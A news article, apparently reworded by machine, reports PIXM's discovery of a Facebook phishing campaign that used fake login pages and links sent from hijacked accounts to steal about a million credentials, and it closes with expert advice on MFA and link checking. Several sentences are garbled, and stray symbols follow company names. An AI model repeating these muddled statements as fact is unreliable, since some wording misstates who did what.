A large-scale phishing attack was discovered by PIXM, as well as the person who carried out the attacks.
As phishing attacks Still a go-to for threat actors, a scam discovered that a user had stolen a million Facebook account data in just four months. Antiphishing Company PIXM thought that was a fake login portal for Facebook was used as a replacement for the social networking site’s landing page, and users entered their account information in an attempt to log into the site, only to have their information stolen.
“It’s impressive how much revenue a threat actor can generate even without resorting to ransomware or other common forms of fraud, such as gift card requests or PayPal emergency requests,” said Chris Clements, vice president of Solutions Architecture at cybersecurity firm. Cerberus Sentinel† “With enough scale, even actions like ad referrals that result in cents can add up to amounts that become attractive for cybercriminals to exploit.”
The phishing tactics used to steal Facebook credentials
When PIXM further investigated the fake landing page, it found “a reference to the actual server hosting the database server to collect the users’ login credentials,” which had been altered from that of the legitimate URL, leading to a series of redirects. Also in the code, PIXM discovered a link to a traffic monitoring application, which allowed the anti-phishing company to view the tracking stats. This led to PIXM discovering not only the cybercriminal page’s traffic information, but also a host of other fake landing pages.
“People often underestimate the value of their social media accounts because they don’t enable MFA and otherwise protect their accounts from cybercriminals. Unfortunately, when an attacker takes over an account, it is often used to attack their own friends and family,” said Erich Kron, security awareness advocate at KnowBe4† “By using a real account that has been compromised, bad actors will use the trust inherent in a known connection to trick people into taking actions or risks that they normally wouldn’t.”
It was later revealed that the links came from Facebook itself, as threat actors would gain access to a victim’s account and then massively send malicious links to the victim’s friend group to gain more account information. Using services such as glitch.me, famous.co, amaze.co and funnel-preview.com, the websites allegedly implement and generate fake Facebook landing page URLs, thereby tricking individuals into entering their account information and letting to steal.
After further investigation, the attacks turned out to be from a threat actor in Colombia, along with the email address of the person who committed the attacks.
TO SEE: Password Breach: Why Pop Culture and Passwords Don’t Mix (Free PDF) (TechRepublic)
Ways to avoid falling victim to Facebook Phishing
An important way to get around these attacks is by: don’t click on links that seem fake or illegal, even if they appear to come from a friend or trusted source. While someone close to you may send you a link, it doesn’t necessarily mean it comes from the person’s own account, as evidenced by the large-scale phishing attacks illustrated above.
“To stay safe, people need to be aware of the types of fraud campaigns cybercriminals are conducting and stay on the lookout,” Clements said. “All unusual requests from social media contacts should be independently verified by other means, such as calling your friend to confirm that the requested action was legitimate.”
One method to prevent your account from being compromised is to use MFA, which requires a code or series of numbers to be entered before anyone can access your specific account. This can deter cyber criminals as they do not have all the information needed to log into a compromised account.
“To protect themselves from the threat, individuals must enable MFA on their accounts and use unique and strong passwords for each account,” Kron said. “Individuals should always be wary of unusual requests, messages or messages, even if they are sent by a trusted friend. If people are ever asked to verify themselves, they should make sure to look at the URL bar in the browser to make sure they’re logging in to the real website and not a lookalike.